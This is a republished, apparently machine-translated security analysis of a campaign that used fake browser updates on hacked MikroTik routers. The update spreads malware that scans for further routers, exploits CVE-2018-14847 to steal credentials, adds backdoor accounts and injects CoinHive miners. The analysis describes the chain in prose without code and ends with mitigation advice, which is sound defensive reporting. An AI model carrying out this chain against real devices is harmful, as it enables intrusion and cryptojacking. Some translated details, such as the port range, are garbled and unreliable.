Shulou(Shulou.com)05/31 Report--

This article is about how to use fake browser updates to infiltrate MikroTik router experiments. I think it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.

SpiderLabs researchers have discovered what may be the largest malicious Coinhive activity through hacked MikroTik devices, which has now become a broader problem. In the latest attack, the attacker used fake browser update pages to hack into the router. When running a malicious update, the researchers unpack the code to the computer, which can scan for other vulnerable routers on the network and try to exploit it.

Suspicious browser updates

Security researcher @ VriesHd first discovered an attempt to use social engineering technology to hack into vulnerable routers. The network provider running the affected MikroTik router redirects the update on the older version of the browser to the end user.

According to Censys's search, a total of 11000 hacked MikroTik devices provided the fake download page:

The browser root is downloaded from a FTP server, as shown in the following figure:

Interestingly, this IP address is also listed as a free and open Web proxy:

Payload analysis behavior analysis

Payload will disguise itself as an installer called upd_browser.

When we run it, it pops up an error:

However, if you grab network traffic, you can see that there are many different IP addresses trying to connect to port 8291 (8291 is the default port for managing MicroTik routers through winbox applications):

Unpack

The released payload is a relatively large executable file (7.25MB). The header and visualization of this section are shown below:

By looking at the section name, you can see that it packages a simple packer:UPX. The repetition section indicates that too much content has been extracted. After further inspection, the researchers found that it unpackaged a python DLL and other related files into the% TEMP% folder, and then loaded those files. It's easy to guess that the exe file is actually a python script.

The entry point in the script is called upd_browser. Decompiled scripts find that at the core of the malware are two python scripts: upd_browser.py and ups.py.

Script analysis

The main functions of this module are very simple:

As we can see, the error pop-up window is hard-coded and does not warn of any actual errors, but is used as bait. Malware records the victim's IP address by querying the hard-coded address of a tracker made using the legitimate service IP Logger. The tracker takes the form of an image the size of a pixel:

The address is then queried regularly within a defined interval. The most important operation is performed in a function called "scan", which is deployed in multiple parallel threads (the maximum number of threads is defined as thmax = 600). Function to generate pseudo-random IP addresses and try to connect to each of them on port 8291 above. When the connection attempt is successful, it tries another connection, this time on a random port in the range of 56778, 5688. When this fails, the exploit continues: the function poc refers to infecting the router through a known vulnerability. Try initially to obtain credentials by using the path traversal vulnerability CVE-2018-14847: the user.dat file should be in M2 format, so the script comes with a built-in parser (function load_file):

If the password is successfully retrieved from the user.dat file, it decrypts the credentials and uses them to create a backdoor: an account with a randomly generated password. It also sets scheduled tasks to be performed by the router. The scripts set up in the scheduler are generated from hard-coded templates (the cleaned version provided here). Its function is to manipulate the settings of the router and set up the error page to load the CoinHive miners. The error page can be placed in two locations: "webproxy/error.html" or "flash/webproxy/error.html".

Whenever a user tries to view a denied URL, such a page is displayed to the user. However, the malicious script configured in the router is based on an HTTP request error. The fake error page is that wile deceives the original traffic and displays the requested page in iframe. So users won't notice this change when they browse most web. For example:

Mitigation measures

MikroTik users should patch and upgrade the router in a timely manner. The MikroTik download page explains how to upgrade RouterOS. It is important to realize that these vulnerabilities exist and are easy to exploit, because repairing routers is not something that many people are used to doing. However, in many cases, users will not be able to do so unless their Internet service provider performs this operation for them upstream. Through this social engineering tool, we see how criminals try to infect ordinary users and use their computers to scan the Internet for vulnerable routers. This technology is smart because it takes time and resources to be effective. Malware business customers and advanced consumer users are protected from this threat because our anti-malware engine detects and blocks this fake browser update in real time:

The above is how to use fake browsers to update and infiltrate MikroTik routers. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.